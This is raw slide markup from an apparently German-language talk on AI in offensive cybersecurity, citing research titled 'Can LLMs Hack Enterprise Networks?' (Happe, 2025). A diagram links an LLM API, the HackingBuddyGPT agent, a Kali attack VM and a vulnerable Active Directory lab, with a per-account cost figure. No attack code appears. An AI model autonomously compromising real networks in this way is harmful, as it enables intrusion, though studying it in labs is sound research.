              <a:rPr kumimoji="0" lang="de-DE" sz="2100" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> für den Einsatz von </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> in LLMs</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Offensiver Cybersicherheit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="2" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="DA291C"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="de-DE" sz="2100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="A1 Sans"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266700" marR="0" lvl="2" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="DA291C"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Coach</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="A1 Sans"/>
              </a:rPr>
              <a:t>ö</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sterreichisches</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Nationalteam </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="de-DE" sz="2100" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="A1 Sans"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CyberSecurityAustria</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="de-DE" sz="2100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="A1 Sans"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="312" name="Bildplatzhalter 311">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23EBA18E-9DAA-472F-9908-631013624AEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId3">
                    <a14:imgEffect>
                      <a14:saturation sat="0"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2547" t="14413" r="16226"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="705826" y="555209"/>
            <a:ext cx="5220000" cy="5500155"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textplatzhalter 313">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3C854E5-B111-2242-60A6-E88FE28DBDCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275388" y="1975089"/>
            <a:ext cx="5220612" cy="497273"/>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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="de-DE" sz="2800" kern="1200" noProof="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="de-DE" sz="2000" kern="1200" noProof="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="266700" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="de-DE" sz="2000" kern="1200" noProof="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="542925" indent="-276225" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="de-DE" sz="1800" kern="1200" noProof="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="809625" indent="-266700" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="de-DE" sz="1800" kern="1200" noProof="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Professional Services</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1741AD10-021F-1F3D-E2C4-3426D2E7AA89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10498725" y="6532548"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="841398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B0969-2721-7429-A016-BB8805B9F7BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686474" y="487656"/>
            <a:ext cx="10799999" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Can LLMs Hack Enterprise Networks? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>(Happe, 2025)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Gruppieren 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A704AA49-2C08-49D5-CFA3-1BBD761CA503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="848943" y="2024844"/>
            <a:ext cx="10647057" cy="3276364"/>
            <a:chOff x="839416" y="1628800"/>
            <a:chExt cx="10647057" cy="3276364"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rechteck 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ADCDC8C-12FB-10AE-C401-158C8A90F60B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="839416" y="1628800"/>
              <a:ext cx="3132348" cy="100811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bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>OpenAI</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-GB" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>LLM API </a:t>
              </a:r>
              <a:endParaRPr lang="de-AT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rechteck 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{610A8436-1073-8D9D-B703-0BB4726DEE75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="839416" y="3609020"/>
              <a:ext cx="3132348" cy="100811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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>HackingBuddyGPT</a:t>
              </a:r>
              <a:endParaRPr lang="de-AT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rechteck 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE90666E-D59F-F430-AF40-A0A09A9C67EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5303912" y="3609020"/>
              <a:ext cx="1872208" cy="100811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bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Kali Linux</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-GB" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack VM</a:t>
              </a:r>
              <a:endParaRPr lang="de-AT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Wolke 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96CF5912-A6B8-3149-85D0-50797BF59D7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7994085" y="3320988"/>
              <a:ext cx="3492388" cy="1584176"/>
            </a:xfrm>
            <a:prstGeom prst="cloud">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bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GOADv3</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-GB" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Vulnerable AD</a:t>
              </a:r>
              <a:endParaRPr lang="de-AT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Gerade Verbindung mit Pfeil 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24E68F83-54CE-D4A7-698F-497FDAE89DF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="7" idx="3"/>
              <a:endCxn id="8" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7176120" y="4113076"/>
              <a:ext cx="828798" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="47625">
              <a:solidFill>
                <a:schemeClr val="accent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F6293912-165E-9569-4743-5A6049C42B05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415480" y="2636912"/>
              <a:ext cx="0" cy="972108"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="47625">
              <a:solidFill>
                <a:schemeClr val="accent2"/>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5AC6C508-2679-34DF-7BE6-942BFC4542FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3215680" y="2636912"/>
              <a:ext cx="0" cy="972108"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="47625">
              <a:solidFill>
                <a:schemeClr val="accent2"/>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FE008EA3-4D00-ED25-1538-09A6E4E6CD6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3971764" y="3861048"/>
              <a:ext cx="1332148" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="47625">
              <a:solidFill>
                <a:schemeClr val="accent2"/>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51C0D6FF-F892-33A9-0609-373B54B6369D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3971764" y="4365104"/>
              <a:ext cx="1332148" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="47625">
              <a:solidFill>
                <a:schemeClr val="accent2"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Grafik 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D811FE5-EE56-BBAC-D585-84A122F180F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10480550" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2678504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AEDFD-1230-3909-1AE8-320735E121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ADECD8-46C8-F6A7-5E95-E95796716113}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686474" y="487656"/>
            <a:ext cx="10799999" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Can LLMs Hack Enterprise Networks? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>(Happe, 2025)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagramm 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D6C5E03-CADC-7BF5-F4BA-14E7375113B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="529848964"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="705527" y="1088740"/>
          <a:ext cx="8128000" cy="5013589"/>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feld 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A31EB5FF-AEC1-5827-01F5-EAB2F21F432C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8652284" y="3155368"/>
            <a:ext cx="3374249" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0"/>
              <a:t>⌀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> $17.47 / Account</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Grafik 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFEB9300-82A6-6FA7-DFB3-485E4062A264}"/>
              </a:ext>
            </a:extLst>
